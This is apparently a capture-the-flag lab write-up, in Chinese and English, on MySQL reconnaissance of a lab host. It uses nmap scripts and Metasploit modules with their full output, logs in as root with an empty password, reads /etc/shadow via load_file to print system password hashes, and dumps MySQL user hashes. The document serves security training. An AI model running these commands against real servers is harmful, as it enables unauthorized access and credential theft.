MySQL
1
2
3
ip a
inet 192.125.250.2/24
1
2
3
4
nmap 192.125.250.3
PORT STATE SERVICE
3306/tcp open mysql
1
2
3
4
nmap 192.125.250.3 -sV -p 3306
PORT STATE SERVICE VERSION
3306/tcp open mysql MySQL 5.5.62-0ubuntu0.14.04.1
1
2
3
4
5
6
7
8
mysql -h 192.125.250.3 -u root
MySQL [(none)]> show databases;
MySQL [(none)]> use books;
MySQL [books]> select count(*) from authors;
MySQL [books]> select * from authors;
MySQL [books]> help
MySQL [books]> exit
setg
set global variable for the whole metasploit session.
1
2
3
4
5
6
7
8
9
10
11
msfconsole
use auxiliary/scanner/mysql/mysql_writable_dirs
options
set dir_list /usr/share/metasploit-framework/data/wordlists/directory.txt
setg rhosts 192.125.250.3
set verbose false
advanced
set password ""
options
run
1
2
3
4
5
[*] 192.125.250.3:3306 - Checking /tmp...
[+] 192.125.250.3:3306 - /tmp is writeable
[*] 192.125.250.3:3306 - Checking /root...
[+] 192.125.250.3:3306 - /root is writeable
1
2
3
4
5
6
use auxiliary/scanner/mysql/mysql_hashdump
set username root
set password ""
options
exploit
exit
1
2
3
4
mysql -h 192.125.250.3 -u root
MySQL [(none)] > select load_file("/etc/shadow");
MySQL [(none)] > exit
使用root或anonymous的空密码检查 MySQL 服务器。
1
nmap 192.125.250.3 -sV -p 3306 --script=mysql-empty-password
连接到 MySQL 服务器并打印协议和版本号、线程 ID、状态、功能和密码 salt 等信息。
如果执行了服务检测并且服务器似乎正在阻止我们的主机或由于连接过多而被阻止,则此脚本不会运行(请参阅端口规则)。
InteractiveClient
1
nmap 192.125.250.3 -sV -p 3306 --script=mysql-info
尝试列出 MySQL 服务器上的所有用户。
1
nmap 192.125.250.3 -sV -p 3306 --script=mysql-users --script-args="mysqluser='root',mysqlpass=''"
尝试列出 MySQL 服务器上的所有数据库。
1
nmap 192.125.250.3 -sV -p 3306 --script=mysql-databases --script-args="mysqluser='root',mysqlpass=''"
尝试显示 MySQL 服务器上的所有变量。
datadir: /var/lib/mysql/
1
nmap 192.125.250.3 -sV -p 3306 --script=mysql-variables --script-args="mysqluser='root',mysqlpass=''"
根据 CIS MySQL v1.0.2 基准测试的部分内容审核 MySQL 数据库服务器安全配置(该引擎可通过创建适当的审核文件用于其他 MySQL 审核)。
1
nmap 192.125.250.3 -sV -p 3306 --script=mysql-audit --script-args="mysql-audit.username='root',mysql-audit.password='',mysql-audit.filename='/usr/share/nmap/nselib/data/mysql-cis.audit'"
从 MySQL 服务器转储密码哈希,格式适合被 John the Ripper 等工具破解。需要适当的数据库权限(root)。
username and password参数优先于 mysql-brute 和 mysql-empty-password 脚本发现的凭据 。
1
nmap 192.125.250.3 -sV -p 3306 --script=mysql-dump-hashes --script-args="username='root',password=''"
对 MySQL 数据库运行查询并将结果作为表返回。
1
nmap 192.125.250.3 -sV -p 3306 --script=mysql-query --script-args="query='select count(*) from books.authors;',username='root',password=''"
MySQL Recon: Basics(MySQL 侦察:基础知识)
概述
在这个挑战中,我们将了解 MySQL 服务器侦察的基础知识。请开始实验并回答以下问题:
问题
- MySQL服务器的版本是多少?
- 使用什么命令连接远程 MySQL 数据库?
- 数据库服务器上有多少个数据库?
- 表“authors”中有多少条记录?该表存在于“书籍”数据库中。
- 使用合适的 metasploit 模块从服务器转储所有数据库的模式?
- /usr/share/metasploit-framework/data/wordlists/directory.txt 中有多少目录是可写的?列出名称。
- /usr/share/metasploit-framework/data/wordlists/sensitive_files.txt 中有多少敏感文件是可读的?列出名称。
- 查找用户“root”的系统密码哈希。
- 数据库服务器上有多少数据库用户?列出他们的姓名和密码哈希。
- 检查 MySQL 服务器是否允许匿名登录。
- 检查 MySQL 服务器是否支持“InteractiveClient”功能。
- 使用 mysql-users nmap 脚本枚举 MySQL 数据库服务器上的用户。
- 使用 nmap 脚本列出存储在 MySQL 服务器上的所有数据库。
- 使用 nmap 脚本查找 mysql 服务器使用的数据目录。
- 检查是否可以使用 mysql_audi nmap 脚本将文件权限授予非管理员用户。
- 使用 nmap 脚本转储所有用户哈希。
- 使用 mysql-query nmap 脚本查找存储在 MySQL 服务器上的数据库“books”中的表“authors”中存储的记录数。
指示:
- 这个实验室是献给你的!此网络上没有其他用户 :)
- 开始实验室后,您将可以访问 Kali 实例的根终端
- 你的 Kali 有一个 IP 地址为 192.XYZ 的接口运行“ip addr”来知道 X 和 Y 的值。
- 目标机器应位于 IP 地址 192.XY3。
- 不要攻击位于 IP 地址 192.XY1 的网关
我自己的思路
In this challenge we will look at the basics of MySQL server reconnaissance. Please start the lab and answer the following questions:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
root@attackdefense:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
2: ip_vti0@NONE: <NOARP> mtu 1480 qdisc noop state DOWN group default qlen 1000
link/ipip 0.0.0.0 brd 0.0.0.0
31868: eth0@if31869: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:0a:01:00:09 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet 10.1.0.9/16 brd 10.1.255.255 scope global eth0
valid_lft forever preferred_lft forever
31871: eth1@if31872: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:c0:29:3f:02 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet 192.41.63.2/24 brd 192.41.63.255 scope global eth1
valid_lft forever preferred_lft forever
1
2
3
4
5
6
7
8
9
10
root@attackdefense:~# nmap 192.41.63.3
Starting Nmap 7.70 ( https://nmap.org ) at 2022-08-26 01:12 UTC
Nmap scan report for target-1 (192.41.63.3)
Host is up (0.0000090s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
3306/tcp open mysql
MAC Address: 02:42:C0:29:3F:03 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds
Questions
What is the version of MySQL server?
MySQL 5.5.62-0ubuntu0.14.04.1
1
2
3
4
5
6
7
8
9
10
11
root@attackdefense:~# nmap 192.41.63.3 -p 3306 -sV
Starting Nmap 7.70 ( https://nmap.org ) at 2022-08-26 01:13 UTC
Nmap scan report for target-1 (192.41.63.3)
Host is up (0.000036s latency).
PORT STATE SERVICE VERSION
3306/tcp open mysql MySQL 5.5.62-0ubuntu0.14.04.1
MAC Address: 02:42:C0:29:3F:03 (Unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.49 seconds
What command is used to connect to remote MySQL database?
1
2
3
4
5
6
7
8
9
10
root@attackdefense:~# mysql -h 192.41.63.3 -u root
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 44
Server version: 5.5.62-0ubuntu0.14.04.1 (Ubuntu)
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]>
How many databases are present on the database server?
11
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| books |
| data |
| mysql |
| password |
| performance_schema |
| secret |
| store |
| upload |
| vendors |
| videos |
+--------------------+
11 rows in set (0.001 sec)
How many records are present in table “authors”? This table is present inside the “books” database.
10
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
MySQL [(none)]> use books;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [books]> show tables;
+-----------------+
| Tables_in_books |
+-----------------+
| authors |
+-----------------+
1 row in set (0.000 sec)
MySQL [books]> select count(*) from authors;
+----------+
| count(*) |
+----------+
| 10 |
+----------+
1 row in set (0.000 sec)
MySQL [books]> select * from authors;
+----+------------+-----------+-----------------------------+------------+---------------------+
| id | first_name | last_name | email | birthdate | added |
+----+------------+-----------+-----------------------------+------------+---------------------+
| 1 | Gregoria | Lowe | gutmann.rebekah@example.net | 1982-03-09 | 1983-01-11 11:25:43 |
| 2 | Ona | Anderson | ethelyn02@example.net | 1980-06-02 | 1972-05-05 07:26:52 |
| 3 | Emile | Lakin | rippin.freda@example.com | 1979-04-06 | 2010-05-30 20:03:07 |
| 4 | Raul | Barton | mschiller@example.com | 1976-05-06 | 1979-02-08 12:32:29 |
| 5 | Sofia | Collier | rodrigo34@example.net | 1978-06-09 | 1991-05-01 10:02:54 |
| 6 | Wellington | Fay | jared98@example.com | 2011-08-11 | 1992-05-27 23:20:20 |
| 7 | Garnet | Braun | hickle.howell@example.net | 1990-04-27 | 2010-04-13 09:48:36 |
| 8 | Alessia | Kuphal | skiles.reggie@example.net | 1978-04-06 | 2014-08-22 21:23:00 |
| 9 | Deven | Carroll | savanah.zulauf@example.net | 2007-02-15 | 1998-02-16 11:45:32 |
| 10 | Issac | Stanton | ozella10@example.net | 2013-10-13 | 1976-12-09 13:18:45 |
+----+------------+-----------+-----------------------------+------------+---------------------+
10 rows in set (0.000 sec)
Dump the schema of all databases from the server using suitable metasploit module?
该模块从 MySQL 数据库服务器中提取模式信息。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
msf5 > use auxiliary/scanner/mysql/mysql_schemadump
msf5 auxiliary(scanner/mysql/mysql_schemadump) > show options
Module options (auxiliary/scanner/mysql/mysql_schemadump):
Name Current Setting Required Description
---- --------------- -------- -----------
DISPLAY_RESULTS true yes Display the Results to the Screen
PASSWORD no The password for the specified username
RHOSTS yes The target address range or CIDR identifier
RPORT 3306 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads
USERNAME no The username to authenticate as
msf5 auxiliary(scanner/mysql/mysql_schemadump) > setg RHOSTS 192.41.63.3
RHOSTS => 192.41.63.3
msf5 auxiliary(scanner/mysql/mysql_schemadump) > set USERNAME root
USERNAME => root
msf5 auxiliary(scanner/mysql/mysql_schemadump) > run
[+] 192.41.63.3:3306 - Schema stored in: /root/.msf4/loot/20220826013404_default_192.41.63.3_mysql_schema_358644.txt
[+] 192.41.63.3:3306 - MySQL Server Schema
Host: 192.41.63.3
Port: 3306
====================
---
- DBName: books
Tables:
- TableName: authors
Columns:
- ColumnName: id
ColumnType: int(11)
- ColumnName: first_name
ColumnType: varchar(50)
- ColumnName: last_name
ColumnType: varchar(50)
- ColumnName: email
ColumnType: varchar(100)
- ColumnName: birthdate
ColumnType: date
- ColumnName: added
ColumnType: timestamp
- DBName: data
Tables: []
- DBName: password
Tables: []
- DBName: secret
Tables: []
- DBName: store
Tables: []
- DBName: upload
Tables: []
- DBName: vendors
Tables: []
- DBName: videos
Tables: []
[*] 192.41.63.3:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
How many directories present in the /usr/share/metasploit-framework/data/wordlists/directory.txt, are writable? List the names.
/tmp, /root
MYSQL 目录写测试
使用 MySQL SELECT INTO DUMPFILE 功能枚举可写目录,有关更多信息,请参阅参考资料中的 URL。注意:对于找到的每个可写目录,将写入包含文本 test 的具有指定 FILE_NAME 的文件。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
msf5 auxiliary(scanner/mysql/mysql_schemadump) > use auxiliary/scanner/mysql/mysql_writable_dirs
msf5 auxiliary(scanner/mysql/mysql_writable_dirs) > show options
Module options (auxiliary/scanner/mysql/mysql_writable_dirs):
Name Current Setting Required Description
---- --------------- -------- -----------
DIR_LIST yes List of directories to test
FILE_NAME kFhBymFR yes Name of file to write
PASSWORD no The password for the specified username
RHOSTS 192.41.63.3 yes The target address range or CIDR identifier
RPORT 3306 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads
USERNAME root yes The username to authenticate as
msf5 auxiliary(scanner/mysql/mysql_writable_dirs) > set DIR_LIST /usr/share/metasploit-framework/data/wordlists/directory.txt
DIR_LIST => /usr/share/metasploit-framework/data/wordlists/directory.txt
msf5 auxiliary(scanner/mysql/mysql_writable_dirs) > run
[!] 192.41.63.3:3306 - For every writable directory found, a file called kFhBymFR with the text test will be written to the directory.
[*] 192.41.63.3:3306 - Login...
[*] 192.41.63.3:3306 - Checking /tmp...
[+] 192.41.63.3:3306 - /tmp is writeable
[*] 192.41.63.3:3306 - Checking /etc/passwd...
[!] 192.41.63.3:3306 - Can't create/write to file '/etc/passwd/kFhBymFR' (Errcode: 20)
[*] 192.41.63.3:3306 - Checking /etc/shadow...
[!] 192.41.63.3:3306 - Can't create/write to file '/etc/shadow/kFhBymFR' (Errcode: 20)
[*] 192.41.63.3:3306 - Checking /root...
[+] 192.41.63.3:3306 - /root is writeable
[*] 192.41.63.3:3306 - Checking /home...
[!] 192.41.63.3:3306 - Can't create/write to file '/home/kFhBymFR' (Errcode: 13)
[*] 192.41.63.3:3306 - Checking /etc...
[!] 192.41.63.3:3306 - Can't create/write to file '/etc/kFhBymFR' (Errcode: 13)
[*] 192.41.63.3:3306 - Checking /etc/hosts...
[!] 192.41.63.3:3306 - Can't create/write to file '/etc/hosts/kFhBymFR' (Errcode: 20)
[*] 192.41.63.3:3306 - Checking /usr/share...
[!] 192.41.63.3:3306 - Can't create/write to file '/usr/share/kFhBymFR' (Errcode: 13)
[*] 192.41.63.3:3306 - Checking /etc/config...
[!] 192.41.63.3:3306 - Can't create/write to file '/etc/config/kFhBymFR' (Errcode: 2)
[*] 192.41.63.3:3306 - Checking /data...
[!] 192.41.63.3:3306 - Can't create/write to file '/data/kFhBymFR' (Errcode: 2)
[*] 192.41.63.3:3306 - Checking /webdav...
[!] 192.41.63.3:3306 - Can't create/write to file '/webdav/kFhBymFR' (Errcode: 2)
[*] 192.41.63.3:3306 - Checking /doc...
[!] 192.41.63.3:3306 - Can't create/write to file '/doc/kFhBymFR' (Errcode: 2)
[*] 192.41.63.3:3306 - Checking /icons...
[!] 192.41.63.3:3306 - Can't create/write to file '/icons/kFhBymFR' (Errcode: 2)
[*] 192.41.63.3:3306 - Checking /manual...
[!] 192.41.63.3:3306 - Can't create/write to file '/manual/kFhBymFR' (Errcode: 2)
[*] 192.41.63.3:3306 - Checking /pro...
[!] 192.41.63.3:3306 - Can't create/write to file '/pro/kFhBymFR' (Errcode: 2)
[*] 192.41.63.3:3306 - Checking /secure...
[!] 192.41.63.3:3306 - Can't create/write to file '/secure/kFhBymFR' (Errcode: 2)
[*] 192.41.63.3:3306 - Checking /poc...
[!] 192.41.63.3:3306 - Can't create/write to file '/poc/kFhBymFR' (Errcode: 2)
[*] 192.41.63.3:3306 - Checking /pro...
[!] 192.41.63.3:3306 - Can't create/write to file '/pro/kFhBymFR' (Errcode: 2)
[*] 192.41.63.3:3306 - Checking /dir...
[!] 192.41.63.3:3306 - Can't create/write to file '/dir/kFhBymFR' (Errcode: 2)
[*] 192.41.63.3:3306 - Checking /Benefits...
[!] 192.41.63.3:3306 - Can't create/write to file '/Benefits/kFhBymFR' (Errcode: 2)
[*] 192.41.63.3:3306 - Checking /Data...
[!] 192.41.63.3:3306 - Can't create/write to file '/Data/kFhBymFR' (Errcode: 2)
[*] 192.41.63.3:3306 - Checking /Invitation...
[!] 192.41.63.3:3306 - Can't create/write to file '/Invitation/kFhBymFR' (Errcode: 2)
[*] 192.41.63.3:3306 - Checking /Office...
[!] 192.41.63.3:3306 - Can't create/write to file '/Office/kFhBymFR' (Errcode: 2)
[*] 192.41.63.3:3306 - Checking /Site...
[!] 192.41.63.3:3306 - Can't create/write to file '/Site/kFhBymFR' (Errcode: 2)
[*] 192.41.63.3:3306 - Checking /Admin...
[!] 192.41.63.3:3306 - Can't create/write to file '/Admin/kFhBymFR' (Errcode: 2)
[*] 192.41.63.3:3306 - Checking /etc...
[!] 192.41.63.3:3306 - Can't create/write to file '/etc/kFhBymFR' (Errcode: 13)
[*] 192.41.63.3:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
How many of sensitive files present in /usr/share/metasploit-framework/data/wordlists/sensitive_files.txt are readable? List the names.
10
1
2
3
4
5
6
7
8
9
10
/etc/passwd
/etc/shadow
/etc/group
/etc/mysql/my.cnf
/etc/hosts
/etc/hosts.allow
/etc/hosts.deny
/etc/issue
/etc/fstab
/proc/version
MYSQL 文件/目录枚举器
使用 MySQL load_file 功能枚举文件和目录,有关更多信息,请参阅参考资料中的 URL。
MYSQL File/Directory Enumerator
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
msf5 auxiliary(scanner/mysql/mysql_writable_dirs) > use auxiliary/scanner/mysql/mysql_file_enum
msf5 auxiliary(scanner/mysql/mysql_file_enum) > options
Module options (auxiliary/scanner/mysql/mysql_file_enum):
Name Current Setting Required Description
---- --------------- -------- -----------
DATABASE_NAME mysql yes Name of database to use
FILE_LIST yes List of directories to enumerate
PASSWORD no The password for the specified username
RHOSTS 192.41.63.3 yes The target address range or CIDR identifier
RPORT 3306 yes The target port (TCP)
TABLE_NAME NqkHEJOY yes Name of table to use - Warning, if the table already exists its contents will be corrupted
THREADS 1 yes The number of concurrent threads
USERNAME root yes The username to authenticate as
msf5 auxiliary(scanner/mysql/mysql_file_enum) > set FILE_LIST /usr/share/metasploit-framework/data/wordlists/sensitive_files.txt
FILE_LIST => /usr/share/metasploit-framework/data/wordlists/sensitive_files.txt
msf5 auxiliary(scanner/mysql/mysql_file_enum) > run
[+] 192.41.63.3:3306 - /etc/passwd is a file and exists
[+] 192.41.63.3:3306 - /etc/shadow is a file and exists
[+] 192.41.63.3:3306 - /etc/group is a file and exists
[+] 192.41.63.3:3306 - /etc/mysql/my.cnf is a file and exists
[+] 192.41.63.3:3306 - /etc/hosts is a file and exists
[+] 192.41.63.3:3306 - /etc/hosts.allow is a file and exists
[+] 192.41.63.3:3306 - /etc/hosts.deny is a file and exists
[+] 192.41.63.3:3306 - /etc/issue is a file and exists
[+] 192.41.63.3:3306 - /etc/fstab is a file and exists
[+] 192.41.63.3:3306 - /proc/version is a file and exists
[*] 192.41.63.3:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Find the system password hash for user “root”.
S1eBFuRRxwD7qEcUIjHxV7Rkj9OXaIGbIOiHsjPZF2uGmGBjRQ3rrQY3/6M.fWHRBHRntsKhgqnClY2.KC.vA/
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
MySQL [(none)]> select load_file("/etc/shadow");
root:$6$eoOI5IAu$S1eBFuRRxwD7qEcUIjHxV7Rkj9OXaIGbIOiHsjPZF2uGmGBjRQ3rrQY3/6M.fWHRBHRntsKhgqnClY2.KC.vA/:17861:0:99999:7:::
daemon:*:17850:0:99999:7:::
bin:*:17850:0:99999:7:::
sys:*:17850:0:99999:7:::
sync:*:17850:0:99999:7:::
games:*:17850:0:99999:7:::
man:*:17850:0:99999:7:::
lp:*:17850:0:99999:7:::
mail:*:17850:0:99999:7:::
news:*:17850:0:99999:7:::
uucp:*:17850:0:99999:7:::
proxy:*:17850:0:99999:7:::
www-data:*:17850:0:99999:7:::
backup:*:17850:0:99999:7:::
list:*:17850:0:99999:7:::
irc:*:17850:0:99999:7:::
gnats:*:17850:0:99999:7:::
nobody:*:17850:0:99999:7:::
libuuid:!:17850:0:99999:7:::
syslog:*:17850:0:99999:7:::
mysql:!:17857:0:99999:7:::
dbadmin:$6$vZ3Fv3x6$qdB/lOAC1EtlKEC2H8h5f7t33j65WDbHHV50jloFkxFBeQC8QkdbQKpHEp/BkVMQD2C2AFPkYW3.W7jMlMbl5.:17861:0:99999:7:::
How many database users are present on the database server? Lists their names and password hashes.
MYSQL 密码哈希转储
该模块从 MySQL 服务器中提取用户名和加密密码哈希并将它们存储起来以供以后破解。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
msf5 auxiliary(scanner/mysql/mysql_file_enum) > use auxiliary/scanner/mysql/mysql_hashdump
msf5 auxiliary(scanner/mysql/mysql_hashdump) > show options
Module options (auxiliary/scanner/mysql/mysql_hashdump):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
RHOSTS 192.41.63.3 yes The target address range or CIDR identifier
RPORT 3306 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads
USERNAME no The username to authenticate as
msf5 auxiliary(scanner/mysql/mysql_hashdump) > set USERNAME root
USERNAME => root
msf5 auxiliary(scanner/mysql/mysql_hashdump) > run
[+] 192.41.63.3:3306 - Saving HashString as Loot: root:
[+] 192.41.63.3:3306 - Saving HashString as Loot: root:
[+] 192.41.63.3:3306 - Saving HashString as Loot: root:
[+] 192.41.63.3:3306 - Saving HashString as Loot: root:
[+] 192.41.63.3:3306 - Saving HashString as Loot: debian-sys-maint:*CDDA79A15EF590ED57BB5933ECD27364809EE90D
[+] 192.41.63.3:3306 - Saving HashString as Loot: root:
[+] 192.41.63.3:3306 - Saving HashString as Loot: filetest:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
[+] 192.41.63.3:3306 - Saving HashString as Loot: ultra:*827EC562775DC9CE458689D36687DCED320F34B0
[+] 192.41.63.3:3306 - Saving HashString as Loot: guest:*17FD2DDCC01E0E66405FB1BA16F033188D18F646
[+] 192.41.63.3:3306 - Saving HashString as Loot: sigver:*027ADC92DD1A83351C64ABCD8BD4BA16EEDA0AB0
[+] 192.41.63.3:3306 - Saving HashString as Loot: udadmin:*E6DEAD2645D88071D28F004A209691AC60A72AC9
[+] 192.41.63.3:3306 - Saving HashString as Loot: sysadmin:*46CFC7938B60837F46B610A2D10C248874555C14
[*] 192.41.63.3:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Check whether anonymous login is allowed on MySQL Server.
No, it is not allowed.
使用root或anonymous的空密码检查 MySQL 服务器。
1
2
3
4
5
6
7
8
9
10
11
12
13
root@attackdefense:~# nmap -sV --script=mysql-empty-password 192.41.63.3
Starting Nmap 7.70 ( https://nmap.org ) at 2022-08-26 03:13 UTC
Nmap scan report for target-1 (192.41.63.3)
Host is up (0.0000090s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
3306/tcp open mysql MySQL 5.5.62-0ubuntu0.14.04.1
| mysql-empty-password:
|_ root account has empty password
MAC Address: 02:42:C0:29:3F:03 (Unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.49 seconds
Check whether “InteractiveClient” capability is supported on the MySQL server.
Yes, it is supported on the MySQL server.
连接到 MySQL 服务器并打印协议和版本号、线程 ID、状态、功能和密码 salt 等信息。
如果执行了服务检测并且服务器似乎正在阻止我们的主机或由于连接过多而被阻止,则此脚本不会运行(请参阅端口规则)。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
root@attackdefense:~# nmap 192.41.63.3 -p 3306 -sV --script=mysql-info
Starting Nmap 7.70 ( https://nmap.org ) at 2022-08-26 03:19 UTC
Nmap scan report for target-1 (192.41.63.3)
Host is up (0.000076s latency).
PORT STATE SERVICE VERSION
3306/tcp open mysql MySQL 5.5.62-0ubuntu0.14.04.1
| mysql-info:
| Protocol: 10
| Version: 5.5.62-0ubuntu0.14.04.1
| Thread ID: 54
| Capabilities flags: 63487
| Some Capabilities: FoundRows, LongPassword, ODBCClient, IgnoreSigpipes, InteractiveClient, LongColumnFlag, IgnoreSpaceBeforeParenthesis, SupportsCompression, Support41Auth, ConnectWithDatabase, SupportsLoadDataLocal, SupportsTransactions, DontAllowDatabaseTableColumn, Speaks41ProtocolOld, Speaks41ProtocolNew, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
| Status: Autocommit
| Salt: |xcigGmod*@Cn!XxrV6H
|_ Auth Plugin Name: 96
MAC Address: 02:42:C0:29:3F:03 (Unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.47 seconds
Enumerate the users present on MySQL database server using mysql-users nmap script.
filetest, root, debian-sys-maint, guest, sigver, sysadmin, udadmin, ultra
尝试列出 MySQL 服务器上的所有用户。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
root@attackdefense:~# nmap -sV --script=mysql-users --script-args="mysqluser='root',mysqlpass=''" 192.41.63.3
Starting Nmap 7.70 ( https://nmap.org ) at 2022-08-26 03:24 UTC
Nmap scan report for target-1 (192.41.63.3)
Host is up (0.000027s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
3306/tcp open mysql MySQL 5.5.62-0ubuntu0.14.04.1
| mysql-users:
| filetest
| root
| debian-sys-maint
| guest
| sigver
| sysadmin
| udadmin
|_ ultra
MAC Address: 02:42:C0:29:3F:03 (Unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.49 seconds
List all databases stored on the MySQL Server using nmap script.
尝试列出 MySQL 服务器上的所有数据库。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
root@attackdefense:~# nmap -sV --script=mysql-databases --script-args="mysqluser='root',mysqlpass=''" 192.41.63.3
Starting Nmap 7.70 ( https://nmap.org ) at 2022-08-26 03:28 UTC
Nmap scan report for target-1 (192.41.63.3)
Host is up (0.0000090s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
3306/tcp open mysql MySQL 5.5.62-0ubuntu0.14.04.1
| mysql-databases:
| information_schema
| books
| data
| mysql
| password
| performance_schema
| secret
| store
| upload
| vendors
|_ videos
MAC Address: 02:42:C0:29:3F:03 (Unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.51 seconds
Find the data directory used by mysql server using nmap script.
datadir: /var/lib/mysql/
尝试显示 MySQL 服务器上的所有变量。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
root@attackdefense:~# nmap -sV --script=mysql-variables --script-args="mysqluser='root',mysqlpass=''" 192.41.63.3
Starting Nmap 7.70 ( https://nmap.org ) at 2022-08-26 03:31 UTC
Nmap scan report for target-1 (192.41.63.3)
Host is up (0.0000090s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
3306/tcp open mysql MySQL 5.5.62-0ubuntu0.14.04.1
| mysql-variables:
| auto_increment_increment: 1
| auto_increment_offset: 1
| autocommit: ON
| automatic_sp_privileges: ON
| back_log: 50
| basedir: /usr
| big_tables: OFF
| binlog_cache_size: 32768
| binlog_direct_non_transactional_updates: OFF
| binlog_format: STATEMENT
| binlog_stmt_cache_size: 32768
| bulk_insert_buffer_size: 8388608
| character_set_client: latin1
| character_set_connection: latin1
| character_set_database: latin1
| character_set_filesystem: binary
| character_set_results: latin1
| character_set_server: latin1
| character_set_system: utf8
| character_sets_dir: /usr/share/mysql/charsets/
| collation_connection: latin1_swedish_ci
| collation_database: latin1_swedish_ci
| collation_server: latin1_swedish_ci
| completion_type: NO_CHAIN
| concurrent_insert: AUTO
| connect_timeout: 10
| datadir: /var/lib/mysql/
| date_format: %Y-%m-%d
| datetime_format: %Y-%m-%d %H:%i:%s
| default_storage_engine: InnoDB
| default_week_format: 0
| delay_key_write: ON
| delayed_insert_limit: 100
| delayed_insert_timeout: 300
| delayed_queue_size: 1000
| div_precision_increment: 4
| engine_condition_pushdown: ON
| error_count: 0
| event_scheduler: OFF
| expire_logs_days: 10
| external_user:
| flush: OFF
| flush_time: 0
| foreign_key_checks: ON
| ft_boolean_syntax: + -><()~*:""&|
| ft_max_word_len: 84
| ft_min_word_len: 4
| ft_query_expansion_limit: 20
| ft_stopword_file: (built-in)
| general_log: OFF
| general_log_file: /var/lib/mysql/victim-1.log
| group_concat_max_len: 1024
| have_compress: YES
| have_crypt: YES
| have_csv: YES
| have_dynamic_loading: YES
| have_geometry: YES
| have_innodb: YES
